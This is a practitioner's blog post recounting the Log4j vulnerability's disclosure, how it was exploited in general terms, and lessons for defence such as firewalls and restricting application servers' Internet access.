If you’re in the software industry, you probably were shaking your head when the first alerts came out about the Log4j vulnerability. If you were in the information security sector, it was adding up to be a long weekend as you tried to assess the extent of the vulnerability and how to monitor for any possible exploits. If you were a developer, you probably spent the weekend applying patches that seemed to be coming almost daily. The bottom line was that this one could have been a lot worse had we not all been through a few of these things prior, Solarwinds coming to mind. Nonetheless, we all rallied to make sure this would be about as much a non-event as possible and everyone could have a wonderful holiday season.
The vulnerability had the makings of something bad, just by logging a string that contained JNDI calls could result in an application server, more specifically a Java application, logging the string and causing Log4j to load and run malicious code. The early exploits were focused on LDAP calls to load an object represented as a byte array from a remote server, then running the code loaded. Once the program called Log4j to log the string, it was game on as the framework would do what it was told to do, a “feature” implemented in a change package in 2013. We had even been warned about this in a presentation at Blackhat in 2016. But up to this point, nothing had ever happened with the vulnerability.
That was until a researcher, Chen Zhaojun, with Alibaba’s Cloud Security team discovered the flaw and alerted the Apache Software Foundation of the issue in late November. While not all the details are available, it seems the contributors to Log4j were working on a patch for the vulnerability with Mr. Chen when he alerted that users of a Chinese forum were already discussing the flaw, preparing to exploit it. When the first exploit occurred on the gaming platform Minecraft, the rush to disclose and patch was accelerated and the software world started scrambling on a Friday to assess how vulnerable their organization was.
What made this vulnerability more dangerous was that it was in a logging framework used throughout the world due to its simplicity, efficiency, and ease of implementation. Not only did software developers leverage the framework, but tools they used also leveraged it, creating an even more challenging problem in determining if you were vulnerable. It highlighted yet another problem in the software supply chain world where a component of the chain was vulnerable and could put your organization at risk.
What is disturbing is that after the Chinese researcher revealed the vulnerability to ASF, the Chinese government, more specifically it’s Ministry of Industry and Information Technology, also known as MIIT, stopped a cooperative partnership with Alibaba over the incident, citing that Alibaba had not alerted MIIT in a timely fashion. It’s not clear what might have happened if Alibaba had alerted China first before notifying ASF of the issue. One fear is that the Chinese government could have embargoed disclosure until it had weaponized the vulnerability for its own purposes. The actions do put a bit of a chill in how future security issues might be handled by the Chinese.
Exploiting the Vulnerability
With regards to the vulnerability itself, the ease of exploitation is what worried many companies as any string sent in a web request could trigger an exploit. For example, just putting it in a field on a web page could trigger it if the field was logged. Putting it in header fields of the request could also trigger it. Probably the most exploited field was the User Agent field in the HTTP header since most companies will log the agent for debugging purposes and metrics. But, if you weren’t logging some of those fields there was no risk from the vulnerability. That point was probably one of the most difficult to explain to senior management who were rightfully worried.
Still, if the exploit was not properly formatted there also was no risk. That point was especially kind of fun to watch as the attempts came rolling in. We would find people just copying and pasting sample exploits from websites as if those samples would accomplish the task. In other cases, we saw attempts at reconnaissance where attributes of the system were sent in the request as attackers tried to gather more insight into the systems they attacked. As the signatures expanded to RMI and CORBA, the variety of attacks expanded.
Many organizations already had a layer of protection through things like Web Application Firewalls (WAFs) or Next Gen firewalls such as those from Palo Alto Networks. As the exploit signatures evolved, these companies modified their threat signatures to prevent the malicious requests from even coming in the door. In almost all cases, the bulk of the threats were stopped at the firewalls, logged, and dropped.
Even if an exploit was properly formatted, made it through the door, and could download potentially malicious code, if networks didn’t allow the server to reach the Internet there was no way the code could be downloaded, rendering the exploit harmless. That’s something I pointed out in a prior blog entry about the Solarwinds attack. Application servers should not be allowed to connect to the Internet without restrictions, especially those critical to the core operations of your business. When you think about this exploit, the servers most impacted were application servers which should already be at least two layers back from the Internet.
Most organizations put their web servers, usually Apache HTTP servers or Nginx servers, at the perimeter. Those are usually coded in C and would not be subject to this attack. The application servers, usually constructed on Tomcat or other Java based platforms, have no reason to even touch the Internet, much less do it without restrictions. If an application server must reach out to the Internet, it should have restrictions on it to known sites. That’s a lesson we should have all learned from Solarwinds.
Just as we learned more about our environments with Solarwinds, this incident has forced us to review our environments to make sure we are ready for the next one to come, and there will be more to come. Systems will always be reliant on externally sourced frameworks. They give us the ability to write robust software at higher levels of quality and lower costs. But trusting these frameworks to be bullet-proof is foolish. The best approach is to leverage them, but place controls around them to protect the organization.
Knowing your software portfolio, scanning for vulnerabilities, and controlling the networks your servers live in are keys to maintaining a secure environment. Based on the low number of reported exploits, I do believe we all dodged a bullet on this one. It was a wild two weeks leading into Christmas, but my guess is almost all of us got to enjoy the holidays thanks to some proactive security work. But we might not be so lucky next tim.